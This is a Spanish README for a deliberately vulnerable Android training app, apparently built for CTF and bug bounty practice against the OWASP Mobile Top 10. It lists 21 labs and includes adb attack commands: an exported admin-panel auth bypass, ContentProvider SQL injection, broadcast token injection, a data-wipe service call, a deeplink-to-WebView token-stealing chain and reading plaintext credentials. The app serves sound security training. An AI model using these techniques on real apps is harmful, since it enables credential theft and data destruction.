
Aplicación Android deliberadamente vulnerable para investigación de seguridad móvil y práctica de bug bounty - OWASP Mobile Top 10
Una aplicación Android deliberadamente vulnerable para investigación de seguridad móvil, práctica de bug bounty y aprendizaje estilo CTF. Contiene 21 vulnerabilidades documentadas mapeadas al OWASP Mobile Top 10.
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
Inicia la aplicación, resuelve cada laboratorio, captura las flags y envíalas en el marcador CTF integrado en la app.
| Categoría | Vulnerabilidades | Flags |
|---|---|---|
| WebView | WV-01 a WV-05 | 5 |
| Deeplink | DL-01 a DL-04, DL-CHAIN | 5 |
| Auth / Inyección SQL | SQL-01 | 1 |
| Panel de Administración | AP-01 a AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 a BR-03 | 2 |
| Service | SV-01, SV-02a, SV-02b | 2 |
| Intercepción de Red | NET-01 | 1 |
| Banca / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Almacenamiento | STORE-01 | 1 |
| XSS | XSS-01, XSS-02 | 2 |
20 flags en total, más una flag maestra otorgada por capturarlas todas.
| Lista de Laboratorios | Marcador CTF |
|---|---|
| lab |
# Panel de administración - exportado, sin permiso
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Inyección de token mediante broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Borrado de datos mediante servicio exportado
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink a la cadena de RCE en WebView
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Leer credenciales almacenadas en texto plano
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Vigilar secretos registrados en logs
adb logcat | grep Gu3ssWeak
Este proyecto es puramente educativo. Todas las vulnerabilidades son intencionales y están documentadas. Las técnicas mostradas aquí se aplican a aplicaciones reales, pero solo prueba sistemas que poseas o estés autorizado a probar. Consulta SECURITY.md para el descargo de responsabilidad completo y la guía de divulgación responsable.
MIT - consulta LICENSE.